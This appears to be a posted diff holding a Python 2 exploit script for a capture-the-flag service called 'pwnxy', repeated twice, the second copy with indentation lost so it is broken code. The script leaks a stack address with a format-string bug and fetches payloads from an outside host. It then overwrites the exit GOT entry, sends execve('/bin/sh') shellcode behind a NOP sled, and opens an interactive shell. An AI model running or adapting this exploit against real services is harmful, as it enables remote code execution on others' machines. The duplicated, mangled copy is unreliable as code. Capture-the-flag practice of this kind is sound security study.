NickStephens · February 8, 2015 06:12
diff --git a/x.py b/x.py
 #!/usr/bin/env python2

 import socket
 import struct
 import time
 import telnetlib

 p = lambda v: struct.pack("<Q", v)
 u = lambda v: struct.unpack("<Q", v)[0]


 sc = "\xeb\xfe"

 # 64bit shellcode by Dad`, no '\'s
 sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

 # plt
 recv_plt = 0x400990
 puts_plt = 0x4009b0
 bss = 0x602101
 main = 0x400fff

 # got
 recv_got = 0x602020
 exit_got = 0x6020b0

 def runtil(s, mesg):
    buf = ""
    while not mesg in buf:
        buf += s.recv(1)

    return buf

 def prepare_payload1():
    f = open('pwnxy_payload', 'w')

    c = ""
    # 96 is saved rbp
    c  += "%96$lxZ_done_Z\n"

    f.write(c)
    f.close()

 def prepare_leak():
    f = open('pwnxy_payload2', 'w')

    c = ""
    for i in range(50, 200):
        c += "(%d:%%d$lx)" % (i, i)

    f.write(c)
    f.close()

 def create(i):

    assert i <= (2**16)

    if i < 0:
        i = (2**16) - i - 0x200
    return "%%%sc" % str(i).ljust(5, "0")

 def prepare_payload2(scaddr, idx):

    f = open('pwnxy_payload'+str(idx), 'w')

    c  = sc.rjust(256, "\x90")
    
    c += create(((scaddr >> (idx*16)) & 0xffff) - 256)
    c += "%68$hn"

    for i in range(7):
        c += "AAAA"
        c += "AAAAAA"

    c += "(%d:%%%d$lx)" % (68, 68)
    c += "Q"*2
    c += p(exit_got + (idx*2))

    f.write(c)
    f.close()

 prepare_payload1()
 #s = socket.create_connection(("localhost", 1337))
 s = socket.create_connection(("pwnxy.haxdump.com", 1337))

 runtil(s, "\n\n")

 # leak the stack
 s.send("GET http://hackevergreen.org/lol/pwnxy_payload\n\n")
 stackaddr = int(runtil(s, "Z_done_Z\n").split("Z_done_Z")[0].split("\n")[1], 16)
 print "[+] stackleak:", hex(stackaddr)

 scaddr = stackaddr - 0x400
 # overwrite got entry
 for i in range(4):
    #print i
    prepare_payload2(scaddr, i)
    s.send("GET http://hackevergreen.org/lol/pwnxy_payload"+ str(i)+ "\n\n")
    #print runtil(s, "QQ") #.split("(")[1].split(")")[0]

 #print hex(stackaddr)
 #print hex(scaddr)
 # trigger exit
 s.send("GET http://" + sc.rjust(256, "\x90") + "\n/\n/\n\n")

 print "*** interact ***"
 t = telnetlib.Telnet()
 t.sock = s
 t.interact()
	#!/usr/bin/env python2

	import socket
	import struct
	import time
	import telnetlib

	p = lambda v: struct.pack("<Q", v)
	u = lambda v: struct.unpack("<Q", v)[0]


	sc = "\xeb\xfe"

	# 64bit shellcode by Dad`, no '\'s
	sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

	# plt
	recv_plt = 0x400990
	puts_plt = 0x4009b0
	bss = 0x602101
	main = 0x400fff

	# got
	recv_got = 0x602020
	exit_got = 0x6020b0

	def runtil(s, mesg):
	buf = ""
	while not mesg in buf:
	buf += s.recv(1)

	return buf

	def prepare_payload1():
	f = open('pwnxy_payload', 'w')

	c = ""
	# 96 is saved rbp
	c += "%96$lxZ_done_Z\n"

	f.write(c)
	f.close()

	def prepare_leak():
	f = open('pwnxy_payload2', 'w')

	c = ""
	for i in range(50, 200):
	c += "(%d:%%d$lx)" % (i, i)

	f.write(c)
	f.close()

	def create(i):

	assert i <= (2**16)

	if i < 0:
	i = (2**16) - i - 0x200
	return "%%%sc" % str(i).ljust(5, "0")

	def prepare_payload2(scaddr, idx):

	f = open('pwnxy_payload'+str(idx), 'w')

	c = sc.rjust(256, "\x90")

	c += create(((scaddr >> (idx*16)) & 0xffff) - 256)
	c += "%68$hn"

	for i in range(7):
	c += "AAAA"
	c += "AAAAAA"

	c += "(%d:%%%d$lx)" % (68, 68)
	c += "Q"*2
	c += p(exit_got + (idx*2))

	f.write(c)
	f.close()

	prepare_payload1()
	#s = socket.create_connection(("localhost", 1337))
	s = socket.create_connection(("pwnxy.haxdump.com", 1337))

	runtil(s, "\n\n")

	# leak the stack
	s.send("GET http://hackevergreen.org/lol/pwnxy_payload\n\n")
	stackaddr = int(runtil(s, "Z_done_Z\n").split("Z_done_Z")[0].split("\n")[1], 16)
	print "[+] stackleak:", hex(stackaddr)

	scaddr = stackaddr - 0x400
	# overwrite got entry
	for i in range(4):
	#print i
	prepare_payload2(scaddr, i)
	s.send("GET http://hackevergreen.org/lol/pwnxy_payload"+ str(i)+ "\n\n")
	#print runtil(s, "QQ") #.split("(")[1].split(")")[0]

	#print hex(stackaddr)
	#print hex(scaddr)
	# trigger exit
	s.send("GET http://" + sc.rjust(256, "\x90") + "\n/\n/\n\n")

	print "* interact *"
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()